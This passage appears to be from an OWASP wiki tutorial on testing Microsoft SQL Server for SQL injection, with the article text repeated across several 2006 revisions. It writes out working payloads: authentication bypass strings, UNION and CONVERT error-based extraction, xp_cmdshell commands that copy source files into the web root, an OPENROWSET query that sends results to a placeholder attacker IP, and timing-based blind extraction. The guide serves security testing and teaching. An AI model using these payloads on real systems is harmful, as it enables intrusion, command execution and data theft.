* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referrer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
For building the exploits, the penetration tester has to know the operators used in SQL Server. There follow some useful operators and commands/stored procedures:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Stored procedures:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running.<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin'''.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
* Implementing exploits with MS SQL functions<br />
** Most of the examples use the '''exec''' function. Bellow we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file using [[http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp xp_cmdshell]].<br />
<br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
<br />
Here, <br />
<br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
<br />
which produces an HTML document containing the result of the query --so that it can be browsed by the pen tester! And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION) <br />
<br />
<br />
<br />
==1.2 Black Box testing and example==<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referrer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
<br />
===Example 5: Referrer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referrer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
# Daniel Bleichenbacher, Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1, CRYPTO 1998, pp1-12.<br />
# Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.<br />
# Steve Friedl's Unixwiz.net Tech Tips. SQL Injection Attacks by Example. [[http://www.unixwiz.net/techtips/sql-injection.html]]<br />
<br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11534Testing for SQL Server2006-11-03T20:55:02Z<p>Wata: /* References */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
== Black Box testing and example ==<br />
<br />
==1.1 How to Test==<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referrer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
For building the exploits, the penetration tester has to know the operators used in SQL Server. There follow some useful operators and commands/stored procedures:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Stored procedures:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running.<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin'''.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
* Implementing exploits with MS SQL functions<br />
** Most of the examples use the '''exec''' function. Bellow we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file using [[http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp xp_cmdshell]].<br />
<br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
<br />
Here, <br />
<br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
<br />
which produces an HTML document containing the result of the query --so that it can be browsed by the pen tester! And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION) <br />
<br />
<br />
<br />
==1.2 Black Box testing and example==<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referrer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
<br />
===Example 5: Referrer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referrer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
# Daniel Bleichenbacher, Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1, CRYPTO 1998, pp1-12.<br />
# Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.<br />
# Steve Friedl's Unixwiz.net Tech Tips. SQL Injection Attacks by Example. [[http://www.unixwiz.net/techtips/sql-injection.html]]<br />
<br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11533Testing for SQL Server2006-11-03T20:53:05Z<p>Wata: /* Black Box testing and example */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
== Black Box testing and example ==<br />
<br />
==1.1 How to Test==<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referrer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
For building the exploits, the penetration tester has to know the operators used in SQL Server. There follow some useful operators and commands/stored procedures:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Stored procedures:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running.<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin'''.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
* Implementing exploits with MS SQL functions<br />
** Most of the examples use the '''exec''' function. Bellow we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file using [[http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp xp_cmdshell]].<br />
<br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
<br />
Here, <br />
<br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
<br />
which produces an HTML document containing the result of the query --so that it can be browsed by the pen tester! And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION) <br />
<br />
<br />
<br />
==1.2 Black Box testing and example==<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referrer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
<br />
===Example 5: Referrer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referrer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
